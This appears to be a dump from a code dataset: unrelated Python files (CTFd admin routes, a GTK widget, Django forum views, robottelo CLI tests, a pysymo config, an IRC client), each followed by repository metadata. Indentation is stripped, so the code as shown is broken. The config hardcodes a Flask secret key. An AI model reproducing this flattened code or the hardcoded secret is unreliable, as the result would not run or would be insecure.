process(chrm, pos, counts[chrm][pos], ref_1000G.getAnnotation(chrm, pos), CNVhandler)
|
cc0-1.0
| -3,136,855,795,635,907,600
| 30.959064
| 220
| 0.598536
| false
| 2.785423
| false
| false
| false
|
mschwager/CTFd
|
CTFd/admin/teams.py
|
1
|
9765
|
from flask import current_app as app, render_template, request, redirect, jsonify, url_for, Blueprint
from CTFd.utils import admins_only, is_admin, unix_time, get_config, \
set_config, sendmail, rmdir, create_image, delete_image, run_image, container_status, container_ports, \
container_stop, container_start, get_themes, cache, upload_file
from CTFd.models import db, Teams, Solves, Awards, Containers, Challenges, WrongKeys, Keys, Tags, Files, Tracking, Pages, Config, DatabaseError
from passlib.hash import bcrypt_sha256
from sqlalchemy.sql import not_
admin_teams = Blueprint('admin_teams', __name__)
@admin_teams.route('/admin/teams', defaults={'page': '1'})
@admin_teams.route('/admin/teams/<int:page>')
@admins_only
def admin_teams_view(page):
page = abs(int(page))
results_per_page = 50
page_start = results_per_page * (page - 1)
page_end = results_per_page * (page - 1) + results_per_page
teams = Teams.query.order_by(Teams.id.asc()).slice(page_start, page_end).all()
count = db.session.query(db.func.count(Teams.id)).first()[0]
pages = int(count / results_per_page) + (count % results_per_page > 0)
return render_template('admin/teams.html', teams=teams, pages=pages, curr_page=page)
@admin_teams.route('/admin/team/<int:teamid>', methods=['GET', 'POST'])
@admins_only
def admin_team(teamid):
user = Teams.query.filter_by(id=teamid).first_or_404()
if request.method == 'GET':
solves = Solves.query.filter_by(teamid=teamid).all()
solve_ids = [s.chalid for s in solves]
missing = Challenges.query.filter(not_(Challenges.id.in_(solve_ids))).all()
last_seen = db.func.max(Tracking.date).label('last_seen')
addrs = db.session.query(Tracking.ip, last_seen) \
.filter_by(team=teamid) \
.group_by(Tracking.ip) \
.order_by(last_seen.desc()).all()
wrong_keys = WrongKeys.query.filter_by(teamid=teamid).order_by(WrongKeys.date.asc()).all()
awards = Awards.query.filter_by(teamid=teamid).order_by(Awards.date.asc()).all()
score = user.score()
place = user.place()
return render_template('admin/team.html', solves=solves, team=user, addrs=addrs, score=score, missing=missing,
place=place, wrong_keys=wrong_keys, awards=awards)
elif request.method == 'POST':
admin_user = request.form.get('admin', None)
if admin_user:
admin_user = True if admin_user == 'true' else False
user.admin = admin_user
# Set user.banned to hide admins from scoreboard
user.banned = admin_user
db.session.commit()
db.session.close()
return jsonify({'data': ['success']})
verified = request.form.get('verified', None)
if verified:
verified = True if verified == 'true' else False
user.verified = verified
db.session.commit()
db.session.close()
return jsonify({'data': ['success']})
name = request.form.get('name', None)
password = request.form.get('password', None)
email = request.form.get('email', None)
website = request.form.get('website', None)
affiliation = request.form.get('affiliation', None)
country = request.form.get('country', None)
errors = []
name_used = Teams.query.filter(Teams.name == name).first()
if name_used and int(name_used.id) != int(teamid):
errors.append('That name is taken')
email_used = Teams.query.filter(Teams.email == email).first()
if email_used and int(email_used.id) != int(teamid):
errors.append('That email is taken')
if errors:
db.session.close()
return jsonify({'data': errors})
else:
user.name = name
user.email = email
if password:
user.password = bcrypt_sha256.encrypt(password)
user.website = website
user.affiliation = affiliation
user.country = country
db.session.commit()
db.session.close()
return jsonify({'data': ['success']})
@admin_teams.route('/admin/team/<int:teamid>/mail', methods=['POST'])
@admins_only
def email_user(teamid):
message = request.form.get('msg', None)
team = Teams.query.filter(Teams.id == teamid).first()
if message and team:
if sendmail(team.email, message):
return '1'
return '0'
@admin_teams.route('/admin/team/<int:teamid>/ban', methods=['POST'])
@admins_only
def ban(teamid):
user = Teams.query.filter_by(id=teamid).first_or_404()
user.banned = True
db.session.commit()
db.session.close()
return redirect(url_for('admin_scoreboard.admin_scoreboard_view'))
@admin_teams.route('/admin/team/<int:teamid>/unban', methods=['POST'])
@admins_only
def unban(teamid):
user = Teams.query.filter_by(id=teamid).first_or_404()
user.banned = False
db.session.commit()
db.session.close()
return redirect(url_for('admin_scoreboard.admin_scoreboard_view'))
@admin_teams.route('/admin/team/<int:teamid>/delete', methods=['POST'])
@admins_only
def delete_team(teamid):
try:
WrongKeys.query.filter_by(teamid=teamid).delete()
Solves.query.filter_by(teamid=teamid).delete()
Tracking.query.filter_by(team=teamid).delete()
Teams.query.filter_by(id=teamid).delete()
db.session.commit()
db.session.close()
except DatabaseError:
return '0'
else:
return '1'
@admin_teams.route('/admin/solves/<teamid>', methods=['GET'])
@admins_only
def admin_solves(teamid="all"):
if teamid == "all":
solves = Solves.query.all()
else:
solves = Solves.query.filter_by(teamid=teamid).all()
awards = Awards.query.filter_by(teamid=teamid).all()
db.session.close()
json_data = {'solves': []}
for x in solves:
json_data['solves'].append({
'id': x.id,
'chal': x.chal.name,
'chalid': x.chalid,
'team': x.teamid,
'value': x.chal.value,
'category': x.chal.category,
'time': unix_time(x.date)
})
for award in awards:
json_data['solves'].append({
'chal': award.name,
'chalid': None,
'team': award.teamid,
'value': award.value,
'category': award.category or "Award",
'time': unix_time(award.date)
})
json_data['solves'].sort(key=lambda k: k['time'])
return jsonify(json_data)
@admin_teams.route('/admin/fails/all', defaults={'teamid': 'all'}, methods=['GET'])
@admin_teams.route('/admin/fails/<int:teamid>', methods=['GET'])
@admins_only
def admin_fails(teamid):
if teamid == "all":
fails = WrongKeys.query.join(Teams, WrongKeys.teamid == Teams.id).filter(not Teams.banned).count()
solves = Solves.query.join(Teams, Solves.teamid == Teams.id).filter(not Teams.banned).count()
db.session.close()
json_data = {'fails': str(fails), 'solves': str(solves)}
return jsonify(json_data)
else:
fails = WrongKeys.query.filter_by(teamid=teamid).count()
solves = Solves.query.filter_by(teamid=teamid).count()
db.session.close()
json_data = {'fails': str(fails), 'solves': str(solves)}
return jsonify(json_data)
@admin_teams.route('/admin/solves/<int:teamid>/<int:chalid>/solve', methods=['POST'])
@admins_only
def create_solve(teamid, chalid):
solve = Solves(chalid=chalid, teamid=teamid, ip='127.0.0.1', flag='MARKED_AS_SOLVED_BY_ADMIN')
db.session.add(solve)
db.session.commit()
db.session.close()
return '1'
@admin_teams.route('/admin/solves/<int:keyid>/delete', methods=['POST'])
@admins_only
def delete_solve(keyid):
solve = Solves.query.filter_by(id=keyid).first_or_404()
db.session.delete(solve)
db.session.commit()
db.session.close()
return '1'
@admin_teams.route('/admin/wrong_keys/<int:keyid>/delete', methods=['POST'])
@admins_only
def delete_wrong_key(keyid):
wrong_key = WrongKeys.query.filter_by(id=keyid).first_or_404()
db.session.delete(wrong_key)
db.session.commit()
db.session.close()
return '1'
@admin_teams.route('/admin/awards/<int:award_id>/delete', methods=['POST'])
@admins_only
def delete_award(award_id):
award = Awards.query.filter_by(id=award_id).first_or_404()
db.session.delete(award)
db.session.commit()
db.session.close()
return '1'
@admin_teams.route('/admin/teams/<int:teamid>/awards', methods=['GET'])
@admins_only
def admin_awards(teamid):
awards = Awards.query.filter_by(teamid=teamid).all()
awards_list = []
for award in awards:
awards_list.append({
'id': award.id,
'name': award.name,
'description': award.description,
'date': award.date,
'value': award.value,
'category': award.category,
'icon': award.icon
})
json_data = {'awards': awards_list}
return jsonify(json_data)
@admin_teams.route('/admin/awards/add', methods=['POST'])
@admins_only
def create_award():
try:
teamid = request.form['teamid']
name = request.form.get('name', 'Award')
value = request.form.get('value', 0)
award = Awards(teamid, name, value)
award.description = request.form.get('description')
award.category = request.form.get('category')
db.session.add(award)
db.session.commit()
db.session.close()
return '1'
except Exception as e:
print(e)
return '0'
|
apache-2.0
| -7,619,913,300,284,369,000
| 34.769231
| 143
| 0.611162
| false
| 3.341889
| false
| false
| false
|
pmoleri/memorize-accesible
|
score.py
|
1
|
2642
|
# Copyright (C) 2006, 2007, 2008 One Laptop Per Child
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#
import svglabel
import gtk
import os
import theme
class Score(svglabel.SvgLabel):
selected_color = "#818286"
default_color = "#4c4d4f"
status = False
def __init__(self, fill_color, stroke_color, pixbuf=None,
pixbuf_sel=None, status=False):
filename = os.path.join(os.path.dirname(__file__), "images/score.svg")
self.pixbuf_un = pixbuf
self.pixbuf_sel = pixbuf_sel
self.status = status
if self.pixbuf_un == None:
self.pixbuf_un = svglabel.SvgLabel(filename, fill_color,
stroke_color, False,
self.default_color).get_pixbuf()
if self.pixbuf_sel == None:
label = svglabel.SvgLabel(filename, fill_color, stroke_color,
False, self.selected_color)
self.pixbuf_sel = label.get_pixbuf()
if status:
self.pixbuf = self.pixbuf_sel
else:
self.pixbuf = self.pixbuf_un
svglabel.SvgLabel.__init__(self, filename, fill_color, stroke_color,
self.pixbuf, self.default_color, theme.SCORE_SIZE,
theme.SCORE_SIZE)
self.set_selected(status)
def set_selected(self, status):
self.status = status
if status:
self.pixbuf = self.pixbuf_sel
self.modify_bg(gtk.STATE_NORMAL,
gtk.gdk.color_parse(self.selected_color))
else:
self.pixbuf = self.pixbuf_un
self.modify_bg(gtk.STATE_NORMAL,
gtk.gdk.color_parse(self.default_color))
self.queue_draw()
def get_pixbuf_un(self):
return self.pixbuf_un
def get_pixbuf_sel(self):
return self.pixbuf_sel
|
gpl-2.0
| -4,537,865,268,180,813,000
| 36.211268
| 79
| 0.589326
| false
| 4.021309
| false
| false
| false
|
pythonbyexample/PBE
|
dbe/social/views.py
|
1
|
3177
|
# Imports {{{
from PIL import Image as PImage
from dbe.settings import MEDIA_ROOT, MEDIA_URL
from dbe.social.models import *
from dbe.shared.utils import *
from dbe.classviews.list_custom import ListView, ListRelated
from dbe.classviews.edit_custom import CreateView, UpdateView2
from forms import ProfileForm, PostForm
# }}}
class Main(ListView):
"""Main listing."""
model = Forum
context_object_name = "socials"
template_name = "social/list.html"
class ForumView(ListRelated):
"""Listing of threads in a social."""
model = Thread
related_model = Forum
foreign_key_field = "social"
context_object_name = "threads"
template_name = "social.html"
class ThreadView(ListRelated):
"""Listing of posts in a thread."""
model = Post
related_model = Thread
foreign_key_field = "thread"
context_object_name = "posts"
template_name = "thread.html"
class EditProfile(UpdateView2):
model = UserProfile
form_class = ProfileForm
success_url = '#'
template_name = "profile.html"
def form_valid(self, form):
"""Resize and save profile image."""
# remove old image if changed
name = form.cleaned_data.get("avatar", None)
old = UserProfile.objects.get( pk=self.kwargs.get("pk") ).avatar
if old.name and old.name != name:
old.delete()
# save new image to disk & resize new image
self.object = form.save()
if self.object.avatar:
img = PImage.open(self.object.avatar.path)
img.thumbnail((160,160), PImage.ANTIALIAS)
img.save(img.filename, "JPEG")
return redir(self.success_url)
def add_context(self):
img = ("/media/" + self.object.avatar.name) if self.object.avatar else None
return dict(img=img)
class NewTopic(CreateView):
model = Post
form_class = PostForm
title = "Start New Topic"
template_name = "social/post.html"
def increment_post_counter(self):
"""Increment counter of user's posts."""
profile = self.request.user.user_profile
profile.posts += 1
profile.save()
def get_thread(self, form):
data = form.cleaned_data
social = Forum.objects.get(pk=self.args[0])
return Thread.objects.create(social=social, title=data["title"], creator=self.request.user)
def form_valid(self, form):
"""Create new topic."""
data = form.cleaned_data
thread = self.get_thread(form)
Post.objects.create(thread=thread, title=data["title"], body=data["body"], creator=self.request.user)
self.increment_post_counter()
return self.get_success_url()
def get_success_url(self):
return redir("social", pk=self.args[0])
class Reply(NewTopic):
title = "Reply"
def get_success_url(self):
return redir(reverse2("thread", pk=self.args[0]) + "?page=last")
def get_thread(self, form):
return Thread.objects.get(pk=self.args[0])
def social_context(request):
return dict(media_url=MEDIA_URL)
|
bsd-3-clause
| 5,048,343,791,437,051,000
| 28.691589
| 109
| 0.619452
| false
| 3.681344
| false
| false
| false
|
rplevka/robottelo
|
tests/foreman/endtoend/test_cli_endtoend.py
|
1
|
12904
|
"""Smoke tests for the ``CLI`` end-to-end scenario.
:Requirement: Cli Endtoend
:CaseAutomation: Automated
:CaseLevel: Acceptance
:CaseComponent: Hammer
:Assignee: gtalreja
:TestType: Functional
:CaseImportance: High
:Upstream: No
"""
import random
import pytest
from fauxfactory import gen_alphanumeric
from fauxfactory import gen_ipaddr
from .utils import AK_CONTENT_LABEL
from .utils import ClientProvisioningMixin
from robottelo import manifests
from robottelo import ssh
from robottelo.cli.activationkey import ActivationKey
from robottelo.cli.computeresource import ComputeResource
from robottelo.cli.contentview import ContentView
from robottelo.cli.domain import Domain
from robottelo.cli.factory import make_user
from robottelo.cli.host import Host
from robottelo.cli.hostgroup import HostGroup
from robottelo.cli.lifecycleenvironment import LifecycleEnvironment
from robottelo.cli.location import Location
from robottelo.cli.org import Org
from robottelo.cli.product import Product
from robottelo.cli.puppetmodule import PuppetModule
from robottelo.cli.repository import Repository
from robottelo.cli.repository_set import RepositorySet
from robottelo.cli.subnet import Subnet
from robottelo.cli.subscription import Subscription
from robottelo.cli.user import User
from robottelo.config import setting_is_set
from robottelo.config import settings
from robottelo.constants import DEFAULT_LOC
from robottelo.constants import DEFAULT_ORG
from robottelo.constants import DEFAULT_SUBSCRIPTION_NAME
from robottelo.constants import PRDS
from robottelo.constants import REPOS
from robottelo.constants import REPOSET
from robottelo.constants.repos import CUSTOM_RPM_REPO
from robottelo.constants.repos import FAKE_0_PUPPET_REPO
@pytest.fixture(scope='module')
def fake_manifest_is_set():
return setting_is_set('fake_manifest')
@pytest.mark.tier1
@pytest.mark.upgrade
def test_positive_cli_find_default_org():
"""Check if 'Default Organization' is present
:id: 95ffeb7a-134e-4273-bccc-fe8a3a336b2a
:expectedresults: 'Default Organization' is found
"""
result = Org.info({'name': DEFAULT_ORG})
assert result['name'] == DEFAULT_ORG
@pytest.mark.tier1
@pytest.mark.upgrade
def test_positive_cli_find_default_loc():
"""Check if 'Default Location' is present
:id: 11cf0d06-78ff-47e8-9d50-407a2ea31988
:expectedresults: 'Default Location' is found
"""
result = Location.info({'name': DEFAULT_LOC})
assert result['name'] == DEFAULT_LOC
@pytest.mark.tier1
@pytest.mark.upgrade
def test_positive_cli_find_admin_user():
"""Check if Admin User is present
:id: f6755189-05a6-4d2f-a3b8-98be0cfacaee
:expectedresults: Admin User is found and has Admin role
"""
result = User.info({'login': 'admin'})
assert result['login'] == 'admin'
assert result['admin'] == 'yes'
@pytest.mark.skip_if_not_set('compute_resources')
@pytest.mark.tier4
@pytest.mark.on_premises_provisioning
@pytest.mark.upgrade
@pytest.mark.skipif((not settings.repos_hosting_url), reason='Missing repos_hosting_url')
def test_positive_cli_end_to_end(fake_manifest_is_set):
"""Perform end to end smoke tests using RH and custom repos.
1. Create a new user with admin permissions
2. Using the new user from above
1. Create a new organization
2. Clone and upload manifest
3. Create a new lifecycle environment
4. Create a custom product
5. Create a custom YUM repository
6. Create a custom PUPPET repository
7. Enable a Red Hat repository
8. Synchronize the three repositories
9. Create a new content view
10. Associate the YUM and Red Hat repositories to new content view
11. Add a PUPPET module to new content view
12. Publish content view
13. Promote content view to the lifecycle environment
14. Create a new activation key
15. Add the products to the activation key
16. Create a new libvirt compute resource
17. Create a new subnet
18. Create a new domain
19. Create a new hostgroup and associate previous entities to it
20. Provision a client
:id: 8c8b3ffa-0d54-436b-8eeb-1a3542e100a8
:expectedresults: All tests should succeed and Content should be
successfully fetched by client.
"""
# step 1: Create a new user with admin permissions
password = gen_alphanumeric()
user = make_user({'admin': 'true', 'password': password})
user['password'] = password
# step 2.1: Create a new organization
org = _create(user, Org, {'name': gen_alphanumeric()})
# step 2.2: Clone and upload manifest
if fake_manifest_is_set:
with manifests.clone() as manifest:
ssh.upload_file(manifest.content, manifest.filename)
Subscription.upload({'file': manifest.filename, 'organization-id': org['id']})
# step 2.3: Create a new lifecycle environment
lifecycle_environment = _create(
user,
LifecycleEnvironment,
{'name': gen_alphanumeric(), 'organization-id': org['id'], 'prior': 'Library'},
)
# step 2.4: Create a custom product
product = _create(user, Product, {'name': gen_alphanumeric(), 'organization-id': org['id']})
repositories = []
# step 2.5: Create custom YUM repository
yum_repo = _create(
user,
Repository,
{
'content-type': 'yum',
'name': gen_alphanumeric(),
'product-id': product['id'],
'publish-via-http': 'true',
'url': CUSTOM_RPM_REPO,
},
)
repositories.append(yum_repo)
# step 2.6: Create custom PUPPET repository
puppet_repo = _create(
user,
Repository,
{
'content-type': 'puppet',
'name': gen_alphanumeric(),
'product-id': product['id'],
'publish-via-http': 'true',
'url': FAKE_0_PUPPET_REPO,
},
)
repositories.append(puppet_repo)
# step 2.7: Enable a Red Hat repository
if fake_manifest_is_set:
RepositorySet.enable(
{
'basearch': 'x86_64',
'name': REPOSET['rhva6'],
'organization-id': org['id'],
'product': PRDS['rhel'],
'releasever': '6Server',
}
)
rhel_repo = Repository.info(
{
'name': REPOS['rhva6']['name'],
'organization-id': org['id'],
'product': PRDS['rhel'],
}
)
repositories.append(rhel_repo)
# step 2.8: Synchronize the three repositories
for repo in repositories:
Repository.with_user(user['login'], user['password']).synchronize({'id': repo['id']})
# step 2.9: Create content view
content_view = _create(
user, ContentView, {'name': gen_alphanumeric(), 'organization-id': org['id']}
)
# step 2.10: Associate the YUM and Red Hat repositories to new content view
repositories.remove(puppet_repo)
for repo in repositories:
ContentView.add_repository(
{
'id': content_view['id'],
'organization-id': org['id'],
'repository-id': repo['id'],
}
)
# step 2.11: Add a PUPPET module to new content view
result = PuppetModule.with_user(user['login'], user['password']).list(
{'repository-id': puppet_repo['id'], 'per-page': False}
)
ContentView.with_user(user['login'], user['password']).puppet_module_add(
{'content-view-id': content_view['id'], 'id': random.choice(result)['id']}
)
# step 2.12: Publish content view
ContentView.with_user(user['login'], user['password']).publish({'id': content_view['id']})
# step 2.13: Promote content view to the lifecycle environment
content_view = ContentView.with_user(user['login'], user['password']).info(
{'id': content_view['id']}
)
assert len(content_view['versions']) == 1
cv_version = ContentView.with_user(user['login'], user['password']).version_info(
{'id': content_view['versions'][0]['id']}
)
assert len(cv_version['lifecycle-environments']) == 1
ContentView.with_user(user['login'], user['password']).version_promote(
{'id': cv_version['id'], 'to-lifecycle-environment-id': lifecycle_environment['id']}
)
# check that content view exists in lifecycle
content_view = ContentView.with_user(user['login'], user['password']).info(
{'id': content_view['id']}
)
assert len(content_view['versions']) == 1
cv_version = ContentView.with_user(user['login'], user['password']).version_info(
{'id': content_view['versions'][0]['id']}
)
assert len(cv_version['lifecycle-environments']) == 2
assert cv_version['lifecycle-environments'][-1]['id'] == lifecycle_environment['id']
# step 2.14: Create a new activation key
activation_key = _create(
user,
ActivationKey,
{
'content-view-id': content_view['id'],
'lifecycle-environment-id': lifecycle_environment['id'],
'name': gen_alphanumeric(),
'organization-id': org['id'],
},
)
# step 2.15: Add the products to the activation key
subscription_list = Subscription.with_user(user['login'], user['password']).list(
{'organization-id': org['id']}, per_page=False
)
for subscription in subscription_list:
if subscription['name'] == DEFAULT_SUBSCRIPTION_NAME:
ActivationKey.with_user(user['login'], user['password']).add_subscription(
{
'id': activation_key['id'],
'quantity': 1,
'subscription-id': subscription['id'],
}
)
# step 2.15.1: Enable product content
if fake_manifest_is_set:
ActivationKey.with_user(user['login'], user['password']).content_override(
{
'content-label': AK_CONTENT_LABEL,
'id': activation_key['id'],
'organization-id': org['id'],
'value': '1',
}
)
# BONUS: Create a content host and associate it with promoted
# content view and last lifecycle where it exists
content_host_name = gen_alphanumeric()
content_host = Host.with_user(user['login'], user['password']).subscription_register(
{
'content-view-id': content_view['id'],
'lifecycle-environment-id': lifecycle_environment['id'],
'name': content_host_name,
'organization-id': org['id'],
}
)
content_host = Host.with_user(user['login'], user['password']).info({'id': content_host['id']})
# check that content view matches what we passed
assert content_host['content-information']['content-view']['name'] == content_view['name']
# check that lifecycle environment matches
assert (
content_host['content-information']['lifecycle-environment']['name']
== lifecycle_environment['name']
)
# step 2.16: Create a new libvirt compute resource
_create(
user,
ComputeResource,
{
'name': gen_alphanumeric(),
'provider': 'Libvirt',
'url': f'qemu+ssh://root@{settings.compute_resources.libvirt_hostname}/system',
},
)
# step 2.17: Create a new subnet
subnet = _create(
user,
Subnet,
{
'name': gen_alphanumeric(),
'network': gen_ipaddr(ip3=True),
'mask': '255.255.255.0',
},
)
# step 2.18: Create a new domain
domain = _create(user, Domain, {'name': gen_alphanumeric()})
# step 2.19: Create a new hostgroup and associate previous entities to it
host_group = _create(
user,
HostGroup,
{'domain-id': domain['id'], 'name': gen_alphanumeric(), 'subnet-id': subnet['id']},
)
HostGroup.with_user(user['login'], user['password']).update(
{
'id': host_group['id'],
'organization-ids': org['id'],
'content-view-id': content_view['id'],
'lifecycle-environment-id': lifecycle_environment['id'],
}
)
# step 2.20: Provision a client
ClientProvisioningMixin().client_provisioning(activation_key['name'], org['label'])
def _create(user, entity, attrs):
"""Creates a Foreman entity and returns it.
:param dict user: A python dictionary representing a User
:param object entity: A valid CLI entity.
:param dict attrs: A python dictionary with attributes to use when
creating entity.
:return: A ``dict`` representing the Foreman entity.
:rtype: dict
"""
# Create new entity as new user
return entity.with_user(user['login'], user['password']).create(attrs)
|
gpl-3.0
| 8,062,769,473,121,014,000
| 32.957895
| 99
| 0.629572
| false
| 3.873912
| true
| false
| false
|
icoz/pysymo
|
config.py
|
1
|
1684
|
# -*- coding: utf-8 -*-
import sys
import os
__author__ = 'ilya-il'
# ==================================================
# PROGRAM CONFIG SECTION. DO NOT EDIT!
# ==================================================
# WTF forms
CSRF_ENABLED = True
SECRET_KEY = 'sifdjncs-dcqodicnpdscn[osncpas#vaidcjnsajcacbqisbccsbab-cdsacvalsdcb!alsjdbafdba'
# priority list
# WARNING! do not change item position in list
# and do not change list type 'list' :)
MSG_PRIORITY_LIST = ['emerg', 'alert', 'crit', 'err', 'warn', 'notice', 'info', 'debug']
# datetime format for search form
DATETIME_FORMAT = '%d.%m.%Y %H:%M:%S'
# pysymo version
PYSYMO_VERSION = 0.2
# log file
if sys.platform == 'win32':
basedir = os.path.abspath(os.path.dirname(__file__))
PYSYMO_LOG = os.path.join(basedir, 'python.log')
else:
PYSYMO_LOG = os.environ.get('PYSYMO_LOG') or '/var/log/pysymo/python.log'
# L10n
LANGUAGES = {
'en': 'English',
'ru': 'Russian'
}
# ==================================================
# USER EDITABLE SECTION
# ==================================================
# watch mode interval in seconds
WATCH_MODE_REFRESH_INTERVAL = 30
# allow registration (only for plain auth)
REGISTRATION_ENABLED = True
# Auth type - plain, ldap
AUTH_TYPE = 'plain'
# LDAP
LDAP_SERVER = os.environ.get('PYSYMO_LDAP_SERVER') or 'ldap://[ldap_server]'
LDAP_SEARCH_BASE = os.environ.get('PYSYMO_LDAP_BASE') or '[organisation]'
LDAP_SERVICE_USER = os.environ.get('PYSYMO_LDAP_USER') or '[service_user_dn]'
LDAP_SERVICE_PASSWORD = os.environ.get('PYSYMO_LDAP_PASSWORD') or '[password]'
# MEDB - message explanation database
MEDB_ENABLED = True
# Use
USE_FQDN = True
|
gpl-2.0
| 3,612,526,265,983,320,600
| 25.730159
| 95
| 0.595606
| false
| 3.118519
| false
| false
| false
|
MrJohz/K-Eight
|
ircutils/client.py
|
1
|
13416
|
""" This module provides a direct client interface for managing an IRC
connection. If you are trying to build a bot, :class:`ircutils.bot.SimpleBot`
inherits from :class:`SimpleClient` so it has the methods listed below.
"""
from __future__ import absolute_import
import collections
import pprint
from . import connection
from . import ctcp
from . import events
from . import format
from . import protocol
class SimpleClient(object):
""" SimpleClient is designed to provide a high level of abstraction
of the IRC protocol. It's methods are structured in a way that allows
you to often bypass the need to send raw IRC commands. By default,
``auto_handle`` is set to ``True`` and allows the client to handle the
following:
* Client nickname changes
* Client channel tracking
* CTCP version requests
"""
software = "http://dev.guardedcode.com/projects/ircutils/"
version = (0,1,3)
custom_listeners = {}
def __init__(self, nick, real_name="A Python IRC Bot by Johz", mode="+B", auto_handle=True):
self.nickname = nick
self.user = nick
self.real_name = real_name
self.filter_formatting = True
self.channels = collections.defaultdict(protocol.Channel)
self.events = events.EventDispatcher()
self._prev_nickname = None
self._mode = mode
self._register_default_listeners()
if auto_handle:
self._add_built_in_handlers()
def __getitem__(self, name):
return self.events[name]
def __setitem__(self, name, value):
self.register_listener(name, value)
def _register_default_listeners(self):
""" Registers the default listeners to the names listed in events. """
# Connection events
for name in events.connection:
self.events.register_listener(name, events.connection[name]())
# Standard events
for name in events.standard:
self.events.register_listener(name, events.standard[name]())
# Message events
for name in events.messages:
self.events.register_listener(name, events.messages[name]())
# CTCP events
for name in events.ctcp:
self.events.register_listener(name, events.ctcp[name]())
# RPL_ events
for name in events.replies:
self.events.register_listener(name, events.replies[name]())
# Custom listeners
for name in self.custom_listeners:
self.events.register_listener(name, self.custom_listeners[name])
def _add_built_in_handlers(self):
""" Adds basic client handlers.
These handlers are bound to events that affect the data the the
client handles. It is required to have these in order to keep
track of things like client nick changes, joined channels,
and channel user lists.
"""
self.events["any"].add_handler(_update_client_info)
self.events["name_reply"].add_handler(_set_channel_names)
self.events["ctcp_version"].add_handler(_reply_to_ctcp_version)
self.events["part"].add_handler(_remove_channel_user_on_part)
self.events["quit"].add_handler(_remove_channel_user_on_quit)
self.events["join"].add_handler(_add_channel_user)
def _dispatch_event(self, prefix, command, params):
""" Given the parameters, dispatch an event.
After first building an event, this method sends the event(s) to the
primary event dispatcher.
This replaces :func:`connection.Connection.handle_line`
"""
try:
self._pending_events
except AttributeError:
self._pending_events = []
# TODO: Event parsing doesn't belong here.
if command in ["PRIVMSG", "NOTICE"]:
event = events.MessageEvent(prefix, command, params)
message_data = event.params[-1]
message_data = ctcp.low_level_dequote(message_data)
message_data, ctcp_requests = ctcp.extract(event.params[-1])
if self.filter_formatting:
message_data = format.filter(message_data)
if message_data.strip() != "":
event.message = message_data
self._pending_events.append(event)
for command, params in ctcp_requests:
ctcp_event = events.CTCPEvent()
ctcp_event.command = "CTCP_%s" % command
ctcp_event.params = params
ctcp_event.source = event.source
ctcp_event.target = event.target
self._pending_events.append(ctcp_event)
else:
self._pending_events.append(events.StandardEvent(prefix, command, params))
while self._pending_events:
event = self._pending_events.pop(0)
self.events.dispatch(self, event)
def connect(self, host, port=None, channel=None, use_ssl=False,
password=None):
""" Connect to an IRC server. """
self.conn = connection.Connection()
self.conn.handle_line = self._dispatch_event
self.conn.connect(host, port, use_ssl, password)
self.conn.execute("USER", self.user, self._mode, "*",
trailing=self.real_name)
self.conn.execute("NICK", self.nickname)
self.conn.handle_connect = self._handle_connect
self.conn.handle_close = self._handle_disconnect
if channel is not None:
# Builds a handler on-the-fly for joining init channels
if isinstance(channel, basestring):
channels = [channel]
else:
channels = channel
def _auto_joiner(client, event):
for channel in channels:
client.join_channel(channel)
self.events["welcome"].add_handler(_auto_joiner)
def is_connected(self):
return self.conn.connected
def _handle_connect(self):
connection.Connection.handle_connect(self.conn)
event = events.ConnectionEvent("CONN_CONNECT")
self.events.dispatch(self, event)
def _handle_disconnect(self):
connection.Connection.handle_close(self.conn)
event = events.ConnectionEvent("CONN_DISCONNECT")
self.events.dispatch(self, event)
def register_listener(self, event_name, listener):
""" Registers an event listener for a given event name.
In essence, this binds the event name to the listener and simply
provides an easier way to reference the listener.
::
client.register_listener("event_name", MyListener())
"""
self.events.register_listener(event_name, listener)
def identify(self, ns_password):
""" Identify yourself with the NickServ service on IRC.
This assumes that NickServ is present on the server.
"""
self.send_message("NickServ", "IDENTIFY {0}".format(ns_password))
def join_channel(self, channel, key=None):
""" Join the specified channel. Optionally, provide a key to the channel
if it requires one.
::
client.join_channel("#channel_name")
client.join_channel("#channel_name", "channelkeyhere")
"""
if channel == "0":
self.channels = []
self.execute("JOIN", "0")
else:
if key is not None:
params = [channel, key]
else:
params = [channel]
self.execute("JOIN", *params)
def part_channel(self, channel, message=None):
""" Leave the specified channel.
You may provide a message that shows up during departure.
"""
self.execute("PART", channel, trailing=message)
def send_message(self, target, message, to_service=False):
""" Sends a message to the specified target.
If it is a service, it uses SQUERY instead.
"""
message = ctcp.low_level_quote(message)
if to_service:
self.execute("SQUERY", target, message)
else:
self.execute("PRIVMSG", target, trailing=message)
def send_notice(self, target, message):
""" Sends a NOTICE to the specified target.
"""
message = ctcp.low_level_quote(message)
self.execute("NOTICE", target, trailing=message)
def send_ctcp(self, target, command, params=None):
""" Sends a CTCP (Client-to-Client-Protocol) message to the target.
"""
if params is not None:
params.insert(0, command)
self.send_message(target, ctcp.tag(" ".join(params)))
else:
self.send_message(target, ctcp.tag(command))
def send_ctcp_reply(self, target, command, params=None):
""" Sends a CTCP reply message to the target.
This differs from send_ctcp() because it uses NOTICE instead, as
specified by the CTCP documentation.
"""
if params is not None:
params.insert(0, command)
self.send_notice(target, ctcp.tag(" ".join(params)))
else:
self.send_notice(target, ctcp.tag(command))
def send_action(self, target, action_message):
""" Perform an "action". This is the same as when a person uses the
``/me is jumping up and down!`` command in their IRC client.
"""
self.send_ctcp(target, "ACTION", [action_message])
def set_nickname(self, nickname):
""" Attempts to set the nickname for the client. """
self._prev_nickname = self.nickname
self.execute("NICK", nickname)
def disconnect(self, message=None):
""" Disconnects from the IRC server.
If `message` is set, it is provided as a departing message.
Example::
client.disconnect("Goodbye cruel world!")
"""
self.execute("QUIT", trailing=message)
self.channels = []
self.conn.close_when_done()
def start(self):
""" Begin the client.
If you wish to run multiple clients at the same time, be sure to
use ``ircutils.start_all()`` instead.
"""
self.conn.start()
def execute(self, command, *args, **kwargs):
""" Execute an IRC command on the server.
Example::
self.execute("PRIVMSG", channel, trailing="Hello, world!")
"""
command, params = self.conn.execute(command, *args, **kwargs)
# Some less verbose aliases
join = join_channel
part = part_channel
notice = send_notice
action = send_action
quit = disconnect
